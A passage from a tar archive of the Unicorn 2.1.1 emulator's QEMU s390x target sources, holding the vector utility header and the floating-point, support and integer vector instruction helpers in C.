size_t *size); uc_err reg_write_s390x(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_s390x(struct uc_struct *uc); #endif ���������������������������unicorn-2.1.1/qemu/target/s390x/vec.h���������������������������������������������������������������0000664�0000000�0000000�00000007405�14675241067�0017263�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x vector utilitites * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef S390X_VEC_H #define S390X_VEC_H #include "tcg/tcg.h" typedef union S390Vector { uint64_t doubleword[2]; uint32_t word[4]; uint16_t halfword[8]; uint8_t byte[16]; } S390Vector; /* * Each vector is stored as two 64bit host values. So when talking about * byte/halfword/word numbers, we have to take care of proper translation * between element numbers. * * Big Endian (target/possible host) * B: [ 0][ 1][ 2][ 3][ 4][ 5][ 6][ 7] - [ 8][ 9][10][11][12][13][14][15] * HW: [ 0][ 1][ 2][ 3] - [ 4][ 5][ 6][ 7] * W: [ 0][ 1] - [ 2][ 3] * DW: [ 0] - [ 1] * * Little Endian (possible host) * B: [ 7][ 6][ 5][ 4][ 3][ 2][ 1][ 0] - [15][14][13][12][11][10][ 9][ 8] * HW: [ 3][ 2][ 1][ 0] - [ 7][ 6][ 5][ 4] * W: [ 1][ 0] - [ 3][ 2] * DW: [ 0] - [ 1] */ #ifndef HOST_WORDS_BIGENDIAN #define H1(x) ((x) ^ 7) #define H2(x) ((x) ^ 3) #define H4(x) ((x) ^ 1) #else #define H1(x) (x) #define H2(x) (x) #define H4(x) (x) #endif static inline uint8_t s390_vec_read_element8(const S390Vector *v, uint8_t enr) { g_assert(enr < 16); return v->byte[H1(enr)]; } static inline uint16_t s390_vec_read_element16(const S390Vector *v, uint8_t enr) { g_assert(enr < 8); return v->halfword[H2(enr)]; } static inline uint32_t s390_vec_read_element32(const S390Vector *v, uint8_t enr) { g_assert(enr < 4); return v->word[H4(enr)]; } static inline uint64_t s390_vec_read_element64(const S390Vector *v, uint8_t enr) { g_assert(enr < 2); return v->doubleword[enr]; } static inline uint64_t s390_vec_read_element(const S390Vector *v, uint8_t enr, uint8_t es) { switch (es) { case MO_8: return s390_vec_read_element8(v, enr); case MO_16: return s390_vec_read_element16(v, enr); case MO_32: return s390_vec_read_element32(v, enr); case MO_64: return s390_vec_read_element64(v, enr); default: g_assert_not_reached(); } } static inline void s390_vec_write_element8(S390Vector *v, uint8_t enr, uint8_t data) { g_assert(enr < 16); v->byte[H1(enr)] = data; } static inline void s390_vec_write_element16(S390Vector *v, uint8_t enr, uint16_t data) { g_assert(enr < 8); v->halfword[H2(enr)] = data; } static inline void s390_vec_write_element32(S390Vector *v, uint8_t enr, uint32_t data) { g_assert(enr < 4); v->word[H4(enr)] = data; } static inline void s390_vec_write_element64(S390Vector *v, uint8_t enr, uint64_t data) { g_assert(enr < 2); v->doubleword[enr] = data; } static inline void s390_vec_write_element(S390Vector *v, uint8_t enr, uint8_t es, uint64_t data) { switch (es) { case MO_8: s390_vec_write_element8(v, enr, data); break; case MO_16: s390_vec_write_element16(v, enr, data); break; case MO_32: s390_vec_write_element32(v, enr, data); break; case MO_64: s390_vec_write_element64(v, enr, data); break; default: g_assert_not_reached(); } } #endif /* S390X_VEC_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/vec_fpu_helper.c����������������������������������������������������0000664�0000000�0000000�00000044631�14675241067�0021471�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x vector floating point instruction support * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu-common.h" #include "cpu.h" #include "internal.h" #include "vec.h" #include "tcg_s390x.h" #include "tcg/tcg-gvec-desc.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" #define VIC_INVALID 0x1 #define VIC_DIVBYZERO 0x2 #define VIC_OVERFLOW 0x3 #define VIC_UNDERFLOW 0x4 #define VIC_INEXACT 0x5 /* returns the VEX. If the VEX is 0, there is no trap */ static uint8_t check_ieee_exc(CPUS390XState *env, uint8_t enr, bool XxC, uint8_t *vec_exc) { uint8_t vece_exc = 0, trap_exc; unsigned qemu_exc; /* Retrieve and clear the softfloat exceptions */ qemu_exc = env->fpu_status.float_exception_flags; if (qemu_exc == 0) { return 0; } env->fpu_status.float_exception_flags = 0; vece_exc = s390_softfloat_exc_to_ieee(qemu_exc); /* Add them to the vector-wide s390x exception bits */ *vec_exc |= vece_exc; /* Check for traps and construct the VXC */ trap_exc = vece_exc & env->fpc >> 24; if (trap_exc) { if (trap_exc & S390_IEEE_MASK_INVALID) { return enr << 4 | VIC_INVALID; } else if (trap_exc & S390_IEEE_MASK_DIVBYZERO) { return enr << 4 | VIC_DIVBYZERO; } else if (trap_exc & S390_IEEE_MASK_OVERFLOW) { return enr << 4 | VIC_OVERFLOW; } else if (trap_exc & S390_IEEE_MASK_UNDERFLOW) { return enr << 4 | VIC_UNDERFLOW; } else if (!XxC) { g_assert(trap_exc & S390_IEEE_MASK_INEXACT); /* inexact has lowest priority on traps */ return enr << 4 | VIC_INEXACT; } } return 0; } static void handle_ieee_exc(CPUS390XState *env, uint8_t vxc, uint8_t vec_exc, uintptr_t retaddr) { if (vxc) { /* on traps, the fpc flags are not updated, instruction is suppressed */ tcg_s390_vector_exception(env, vxc, retaddr); } if (vec_exc) { /* indicate exceptions for all elements combined */ env->fpc |= vec_exc << 16; } } typedef uint64_t (*vop64_2_fn)(uint64_t a, float_status *s); static void vop64_2(S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool s, bool XxC, uint8_t erm, vop64_2_fn fn, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i, old_mode; old_mode = s390_swap_bfp_rounding_mode(env, erm); for (i = 0; i < 2; i++) { const uint64_t a = s390_vec_read_element64(v2, i); s390_vec_write_element64(&tmp, i, fn(a, &env->fpu_status)); vxc = check_ieee_exc(env, i, XxC, &vec_exc); if (s || vxc) { break; } } s390_restore_bfp_rounding_mode(env, old_mode); handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } typedef uint64_t (*vop64_3_fn)(uint64_t a, uint64_t b, float_status *s); static void vop64_3(S390Vector *v1, const S390Vector *v2, const S390Vector *v3, CPUS390XState *env, bool s, vop64_3_fn fn, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i; for (i = 0; i < 2; i++) { const uint64_t a = s390_vec_read_element64(v2, i); const uint64_t b = s390_vec_read_element64(v3, i); s390_vec_write_element64(&tmp, i, fn(a, b, &env->fpu_status)); vxc = check_ieee_exc(env, i, false, &vec_exc); if (s || vxc) { break; } } handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } static uint64_t vfa64(uint64_t a, uint64_t b, float_status *s) { return float64_add(a, b, s); } void HELPER(gvec_vfa64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, false, vfa64, GETPC()); } void HELPER(gvec_vfa64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, true, vfa64, GETPC()); } static int wfc64(const S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool signal, uintptr_t retaddr) { /* only the zero-indexed elements are compared */ const float64 a = s390_vec_read_element64(v1, 0); const float64 b = s390_vec_read_element64(v2, 0); uint8_t vxc, vec_exc = 0; int cmp; if (signal) { cmp = float64_compare(a, b, &env->fpu_status); } else { cmp = float64_compare_quiet(a, b, &env->fpu_status); } vxc = check_ieee_exc(env, 0, false, &vec_exc); handle_ieee_exc(env, vxc, vec_exc, retaddr); return float_comp_to_cc(env, cmp); } void HELPER(gvec_wfc64)(const void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { env->cc_op = wfc64(v1, v2, env, false, GETPC()); } void HELPER(gvec_wfk64)(const void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { env->cc_op = wfc64(v1, v2, env, true, GETPC()); } typedef int (*vfc64_fn)(float64 a, float64 b, float_status *status); static int vfc64(S390Vector *v1, const S390Vector *v2, const S390Vector *v3, CPUS390XState *env, bool s, vfc64_fn fn, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int match = 0; int i; for (i = 0; i < 2; i++) { const float64 a = s390_vec_read_element64(v2, i); const float64 b = s390_vec_read_element64(v3, i); /* swap the order of the parameters, so we can use existing functions */ if (fn(b, a, &env->fpu_status)) { match++; s390_vec_write_element64(&tmp, i, -1ull); } vxc = check_ieee_exc(env, i, false, &vec_exc); if (s || vxc) { break; } } handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; if (match) { return s || match == 2 ? 0 : 1; } return 3; } void HELPER(gvec_vfce64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, false, float64_eq_quiet, GETPC()); } void HELPER(gvec_vfce64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, true, float64_eq_quiet, GETPC()); } void HELPER(gvec_vfce64_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, false, float64_eq_quiet, GETPC()); } void HELPER(gvec_vfce64s_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, true, float64_eq_quiet, GETPC()); } void HELPER(gvec_vfch64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, false, float64_lt_quiet, GETPC()); } void HELPER(gvec_vfch64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, true, float64_lt_quiet, GETPC()); } void HELPER(gvec_vfch64_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, false, float64_lt_quiet, GETPC()); } void HELPER(gvec_vfch64s_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, true, float64_lt_quiet, GETPC()); } void HELPER(gvec_vfche64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, false, float64_le_quiet, GETPC()); } void HELPER(gvec_vfche64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, true, float64_le_quiet, GETPC()); } void HELPER(gvec_vfche64_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, false, float64_le_quiet, GETPC()); } void HELPER(gvec_vfche64s_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, true, float64_le_quiet, GETPC()); } static uint64_t vcdg64(uint64_t a, float_status *s) { return int64_to_float64(a, s); } void HELPER(gvec_vcdg64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, false, XxC, erm, vcdg64, GETPC()); } void HELPER(gvec_vcdg64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vcdg64, GETPC()); } static uint64_t vcdlg64(uint64_t a, float_status *s) { return uint64_to_float64(a, s); } void HELPER(gvec_vcdlg64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, false, XxC, erm, vcdlg64, GETPC()); } void HELPER(gvec_vcdlg64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vcdlg64, GETPC()); } static uint64_t vcgd64(uint64_t a, float_status *s) { return float64_to_int64(a, s); } void HELPER(gvec_vcgd64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, false, XxC, erm, vcgd64, GETPC()); } void HELPER(gvec_vcgd64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vcgd64, GETPC()); } static uint64_t vclgd64(uint64_t a, float_status *s) { return float64_to_uint64(a, s); } void HELPER(gvec_vclgd64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, false, XxC, erm, vclgd64, GETPC()); } void HELPER(gvec_vclgd64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vclgd64, GETPC()); } static uint64_t vfd64(uint64_t a, uint64_t b, float_status *s) { return float64_div(a, b, s); } void HELPER(gvec_vfd64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, false, vfd64, GETPC()); } void HELPER(gvec_vfd64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, true, vfd64, GETPC()); } static uint64_t vfi64(uint64_t a, float_status *s) { return float64_round_to_int(a, s); } void HELPER(gvec_vfi64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, false, XxC, erm, vfi64, GETPC()); } void HELPER(gvec_vfi64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vfi64, GETPC()); } static void vfll32(S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool s, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i; for (i = 0; i < 2; i++) { /* load from even element */ const float32 a = s390_vec_read_element32(v2, i * 2); const uint64_t ret = float32_to_float64(a, &env->fpu_status); s390_vec_write_element64(&tmp, i, ret); /* indicate the source element */ vxc = check_ieee_exc(env, i * 2, false, &vec_exc); if (s || vxc) { break; } } handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } void HELPER(gvec_vfll32)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { vfll32(v1, v2, env, false, GETPC()); } void HELPER(gvec_vfll32s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { vfll32(v1, v2, env, true, GETPC()); } static void vflr64(S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool s, bool XxC, uint8_t erm, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i, old_mode; old_mode = s390_swap_bfp_rounding_mode(env, erm); for (i = 0; i < 2; i++) { float64 a = s390_vec_read_element64(v2, i); uint32_t ret = float64_to_float32(a, &env->fpu_status); /* place at even element */ s390_vec_write_element32(&tmp, i * 2, ret); /* indicate the source element */ vxc = check_ieee_exc(env, i, XxC, &vec_exc); if (s || vxc) { break; } } s390_restore_bfp_rounding_mode(env, old_mode); handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } void HELPER(gvec_vflr64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vflr64(v1, v2, env, false, XxC, erm, GETPC()); } void HELPER(gvec_vflr64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vflr64(v1, v2, env, true, XxC, erm, GETPC()); } static uint64_t vfm64(uint64_t a, uint64_t b, float_status *s) { return float64_mul(a, b, s); } void HELPER(gvec_vfm64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, false, vfm64, GETPC()); } void HELPER(gvec_vfm64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, true, vfm64, GETPC()); } static void vfma64(S390Vector *v1, const S390Vector *v2, const S390Vector *v3, const S390Vector *v4, CPUS390XState *env, bool s, int flags, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i; for (i = 0; i < 2; i++) { const uint64_t a = s390_vec_read_element64(v2, i); const uint64_t b = s390_vec_read_element64(v3, i); const uint64_t c = s390_vec_read_element64(v4, i); uint64_t ret = float64_muladd(a, b, c, flags, &env->fpu_status); s390_vec_write_element64(&tmp, i, ret); vxc = check_ieee_exc(env, i, false, &vec_exc); if (s || vxc) { break; } } handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } void HELPER(gvec_vfma64)(void *v1, const void *v2, const void *v3, const void *v4, CPUS390XState *env, uint32_t desc) { vfma64(v1, v2, v3, v4, env, false, 0, GETPC()); } void HELPER(gvec_vfma64s)(void *v1, const void *v2, const void *v3, const void *v4, CPUS390XState *env, uint32_t desc) { vfma64(v1, v2, v3, v4, env, true, 0, GETPC()); } void HELPER(gvec_vfms64)(void *v1, const void *v2, const void *v3, const void *v4, CPUS390XState *env, uint32_t desc) { vfma64(v1, v2, v3, v4, env, false, float_muladd_negate_c, GETPC()); } void HELPER(gvec_vfms64s)(void *v1, const void *v2, const void *v3, const void *v4, CPUS390XState *env, uint32_t desc) { vfma64(v1, v2, v3, v4, env, true, float_muladd_negate_c, GETPC()); } static uint64_t vfsq64(uint64_t a, float_status *s) { return float64_sqrt(a, s); } void HELPER(gvec_vfsq64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { vop64_2(v1, v2, env, false, false, 0, vfsq64, GETPC()); } void HELPER(gvec_vfsq64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { vop64_2(v1, v2, env, true, false, 0, vfsq64, GETPC()); } static uint64_t vfs64(uint64_t a, uint64_t b, float_status *s) { return float64_sub(a, b, s); } void HELPER(gvec_vfs64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, false, vfs64, GETPC()); } void HELPER(gvec_vfs64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, true, vfs64, GETPC()); } static int vftci64(S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool s, uint16_t i3) { int i, match = 0; for (i = 0; i < 2; i++) { float64 a = s390_vec_read_element64(v2, i); if (float64_dcmask(env, a) & i3) { match++; s390_vec_write_element64(v1, i, -1ull); } else { s390_vec_write_element64(v1, i, 0); } if (s) { break; } } if (match) { return s || match == 2 ? 0 : 1; } return 3; } void HELPER(gvec_vftci64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { env->cc_op = vftci64(v1, v2, env, false, simd_data(desc)); } void HELPER(gvec_vftci64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { env->cc_op = vftci64(v1, v2, env, true, simd_data(desc)); } �������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/vec_helper.c��������������������������������������������������������0000664�0000000�0000000�00000022462�14675241067�0020615�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x vector support instructions * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "vec.h" #include "tcg/tcg.h" #include "tcg/tcg-gvec-desc.h" #include "exec/helper-proto.h" #include "exec/cpu_ldst.h" #include "exec/exec-all.h" void HELPER(vll)(CPUS390XState *env, void *v1, uint64_t addr, uint64_t bytes) { if (likely(bytes >= 16)) { uint64_t t0, t1; t0 = cpu_ldq_data_ra(env, addr, GETPC()); addr = wrap_address(env, addr + 8); t1 = cpu_ldq_data_ra(env, addr, GETPC()); s390_vec_write_element64(v1, 0, t0); s390_vec_write_element64(v1, 1, t1); } else { S390Vector tmp = { 0 }; int i; for (i = 0; i < bytes; i++) { uint8_t byte = cpu_ldub_data_ra(env, addr, GETPC()); s390_vec_write_element8(&tmp, i, byte); addr = wrap_address(env, addr + 1); } *(S390Vector *)v1 = tmp; } } #define DEF_VPK_HFN(BITS, TBITS) \ typedef uint##TBITS##_t (*vpk##BITS##_fn)(uint##BITS##_t, int *); \ static int vpk##BITS##_hfn(S390Vector *v1, const S390Vector *v2, \ const S390Vector *v3, vpk##BITS##_fn fn) \ { \ int i, saturated = 0; \ S390Vector tmp; \ \ for (i = 0; i < (128 / TBITS); i++) { \ uint##BITS##_t src; \ \ if (i < (128 / BITS)) { \ src = s390_vec_read_element##BITS(v2, i); \ } else { \ src = s390_vec_read_element##BITS(v3, i - (128 / BITS)); \ } \ s390_vec_write_element##TBITS(&tmp, i, fn(src, &saturated)); \ } \ *v1 = tmp; \ return saturated; \ } DEF_VPK_HFN(64, 32) DEF_VPK_HFN(32, 16) DEF_VPK_HFN(16, 8) #define DEF_VPK(BITS, TBITS) \ static uint##TBITS##_t vpk##BITS##e(uint##BITS##_t src, int *saturated) \ { \ return src; \ } \ void HELPER(gvec_vpk##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ vpk##BITS##_hfn(v1, v2, v3, vpk##BITS##e); \ } DEF_VPK(64, 32) DEF_VPK(32, 16) DEF_VPK(16, 8) #define DEF_VPKS(BITS, TBITS) \ static uint##TBITS##_t vpks##BITS##e(uint##BITS##_t src, int *saturated) \ { \ if ((int##BITS##_t)src > INT##TBITS##_MAX) { \ (*saturated)++; \ return INT##TBITS##_MAX; \ } else if ((int##BITS##_t)src < INT##TBITS##_MIN) { \ (*saturated)++; \ return INT##TBITS##_MIN; \ } \ return src; \ } \ void HELPER(gvec_vpks##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ vpk##BITS##_hfn(v1, v2, v3, vpks##BITS##e); \ } \ void HELPER(gvec_vpks_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ int saturated = vpk##BITS##_hfn(v1, v2, v3, vpks##BITS##e); \ \ if (saturated == (128 / TBITS)) { \ env->cc_op = 3; \ } else if (saturated) { \ env->cc_op = 1; \ } else { \ env->cc_op = 0; \ } \ } DEF_VPKS(64, 32) DEF_VPKS(32, 16) DEF_VPKS(16, 8) #define DEF_VPKLS(BITS, TBITS) \ static uint##TBITS##_t vpkls##BITS##e(uint##BITS##_t src, int *saturated) \ { \ if (src > UINT##TBITS##_MAX) { \ (*saturated)++; \ return UINT##TBITS##_MAX; \ } \ return src; \ } \ void HELPER(gvec_vpkls##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ vpk##BITS##_hfn(v1, v2, v3, vpkls##BITS##e); \ } \ void HELPER(gvec_vpkls_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ int saturated = vpk##BITS##_hfn(v1, v2, v3, vpkls##BITS##e); \ \ if (saturated == (128 / TBITS)) { \ env->cc_op = 3; \ } else if (saturated) { \ env->cc_op = 1; \ } else { \ env->cc_op = 0; \ } \ } DEF_VPKLS(64, 32) DEF_VPKLS(32, 16) DEF_VPKLS(16, 8) void HELPER(gvec_vperm)(void *v1, const void *v2, const void *v3, const void *v4, uint32_t desc) { S390Vector tmp; int i; for (i = 0; i < 16; i++) { const uint8_t selector = s390_vec_read_element8(v4, i) & 0x1f; uint8_t byte; if (selector < 16) { byte = s390_vec_read_element8(v2, selector); } else { byte = s390_vec_read_element8(v3, selector - 16); } s390_vec_write_element8(&tmp, i, byte); } *(S390Vector *)v1 = tmp; } void HELPER(vstl)(CPUS390XState *env, const void *v1, uint64_t addr, uint64_t bytes) { /* Probe write access before actually modifying memory */ probe_write_access(env, addr, bytes, GETPC()); if (likely(bytes >= 16)) { cpu_stq_data_ra(env, addr, s390_vec_read_element64(v1, 0), GETPC()); addr = wrap_address(env, addr + 8); cpu_stq_data_ra(env, addr, s390_vec_read_element64(v1, 1), GETPC()); } else { S390Vector tmp = { 0 }; int i; for (i = 0; i < bytes; i++) { uint8_t byte = s390_vec_read_element8(v1, i); cpu_stb_data_ra(env, addr, byte, GETPC()); addr = wrap_address(env, addr + 1); } *(S390Vector *)v1 = tmp; } } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/vec_int_helper.c����������������������������������������������������0000664�0000000�0000000�00000076433�14675241067�0021476�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x vector integer instruction support * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu-common.h" #include "cpu.h" #include "vec.h" #include "exec/helper-proto.h" #include "tcg/tcg-gvec-desc.h" static bool s390_vec_is_zero(const S390Vector *v) { return !v->doubleword[0] && !v->doubleword[1]; } static void s390_vec_xor(S390Vector *res, const S390Vector *a, const S390Vector *b) { res->doubleword[0] = a->doubleword[0] ^ b->doubleword[0]; res->doubleword[1] = a->doubleword[1] ^ b->doubleword[1]; } static void s390_vec_and(S390Vector *res, const S390Vector *a, const S390Vector *b) { res->doubleword[0] = a->doubleword[0] & b->doubleword[0]; res->doubleword[1] = a->doubleword[1] & b->doubleword[1]; } static bool s390_vec_equal(const S390Vector *a, const S390Vector *b) { return a->doubleword[0] == b->doubleword[0] && a->doubleword[1] == b->doubleword[1]; } static void s390_vec_shl(S390Vector *d, const S390Vector *a, uint64_t count) { uint64_t tmp; g_assert(count < 128); if (count == 0) { d->doubleword[0] = a->doubleword[0]; d->doubleword[1] = a->doubleword[1]; } else if (count == 64) { d->doubleword[0] = a->doubleword[1]; d->doubleword[1] = 0; } else if (count < 64) { tmp = extract64(a->doubleword[1], 64 - count, count); d->doubleword[1] = a->doubleword[1] << count; d->doubleword[0] = (a->doubleword[0] << count) | tmp; } else { d->doubleword[0] = a->doubleword[1] << (count - 64); d->doubleword[1] = 0; } } static void s390_vec_sar(S390Vector *d, const S390Vector *a, uint64_t count) { uint64_t tmp; if (count == 0) { d->doubleword[0] = a->doubleword[0]; d->doubleword[1] = a->doubleword[1]; } else if (count == 64) { tmp = (int64_t)a->doubleword[0] >> 63; d->doubleword[1] = a->doubleword[0]; d->doubleword[0] = tmp; } else if (count < 64) { tmp = a->doubleword[1] >> count; d->doubleword[1] = deposit64(tmp, 64 - count, count, a->doubleword[0]); d->doubleword[0] = (int64_t)a->doubleword[0] >> count; } else { tmp = (int64_t)a->doubleword[0] >> 63; d->doubleword[1] = (int64_t)a->doubleword[0] >> (count - 64); d->doubleword[0] = tmp; } } static void s390_vec_shr(S390Vector *d, const S390Vector *a, uint64_t count) { uint64_t tmp; g_assert(count < 128); if (count == 0) { d->doubleword[0] = a->doubleword[0]; d->doubleword[1] = a->doubleword[1]; } else if (count == 64) { d->doubleword[1] = a->doubleword[0]; d->doubleword[0] = 0; } else if (count < 64) { tmp = a->doubleword[1] >> count; d->doubleword[1] = deposit64(tmp, 64 - count, count, a->doubleword[0]); d->doubleword[0] = a->doubleword[0] >> count; } else { d->doubleword[1] = a->doubleword[0] >> (count - 64); d->doubleword[0] = 0; } } #define DEF_VAVG(BITS) \ void HELPER(gvec_vavg##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const int32_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, i); \ const int32_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, (a + b + 1) >> 1); \ } \ } DEF_VAVG(8) DEF_VAVG(16) #define DEF_VAVGL(BITS) \ void HELPER(gvec_vavgl##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, (a + b + 1) >> 1); \ } 